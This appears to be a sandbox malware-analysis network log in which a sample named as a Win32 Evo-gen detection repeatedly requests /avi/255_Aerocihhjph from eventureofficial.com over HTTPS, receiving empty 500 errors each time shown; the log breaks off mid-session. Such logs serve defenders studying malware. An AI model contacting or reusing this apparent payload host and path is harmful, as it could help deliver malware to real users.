                15192.168.2.94974468.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:49 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:50 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:49 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.94974668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:51 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:52 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:51 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.94974868.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:53 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:54 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:53 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                18192.168.2.94975068.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:55 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:56 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:55 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                19192.168.2.94975268.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:57 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:24:58 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:57 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                20192.168.2.94975468.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:24:59 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:00 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:24:59 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                21192.168.2.94975668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:01 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:02 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:01 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                22192.168.2.94975868.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:03 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:04 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:03 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                23192.168.2.94976068.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:04 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:06 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:05 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                24192.168.2.94976268.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:06 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:08 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:07 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                25192.168.2.94976468.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:08 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:10 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:09 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                26192.168.2.94976668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:10 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:12 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:11 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                27192.168.2.94976968.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:12 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:14 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:13 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                28192.168.2.94977168.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:14 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:16 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:15 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                29192.168.2.94977368.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:16 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:17 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:17 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                30192.168.2.94977568.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:18 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:19 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:19 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                31192.168.2.94977768.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:20 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:22 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:21 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                32192.168.2.94977968.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:23 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:24 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:23 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                33192.168.2.94978168.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:25 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:26 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:25 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                34192.168.2.94978368.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:27 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:28 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:27 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                35192.168.2.94978568.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:29 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:30 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:29 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                36192.168.2.94978768.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:31 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:32 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:31 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                37192.168.2.94978968.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:33 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:34 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:33 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                38192.168.2.94979168.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:35 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:36 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:35 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                39192.168.2.94979468.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:37 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:38 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:37 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                40192.168.2.94979668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:40 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:41 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:40 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                41192.168.2.94979868.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:41 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:43 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:42 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                42192.168.2.94980068.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:43 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:45 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:44 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                43192.168.2.94980268.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:45 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:46 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:46 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                44192.168.2.94980468.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:47 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:48 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:48 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                45192.168.2.94980668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:49 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:50 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:50 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                46192.168.2.94980868.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:51 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:52 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:52 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                47192.168.2.94981068.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:53 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:54 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:54 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                48192.168.2.94981268.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:55 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:56 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:56 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                49192.168.2.94981468.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:57 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:25:58 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:25:58 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                50192.168.2.94981668.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:25:59 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:26:00 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:00 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                51192.168.2.94981868.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:26:01 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
                2024-04-25 17:26:02 UTC244INHTTP/1.1 500 Internal Server Error
                Date: Thu, 25 Apr 2024 17:26:02 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.16
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Length: 0
                Content-Type: text/html; charset=UTF-8


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                52192.168.2.94982068.178.157.1094433128C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                TimestampBytes transferredDirectionData
                2024-04-25 17:26:03 UTC173OUTGET /avi/255_Aerocihhjph HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: eventureofficial.com
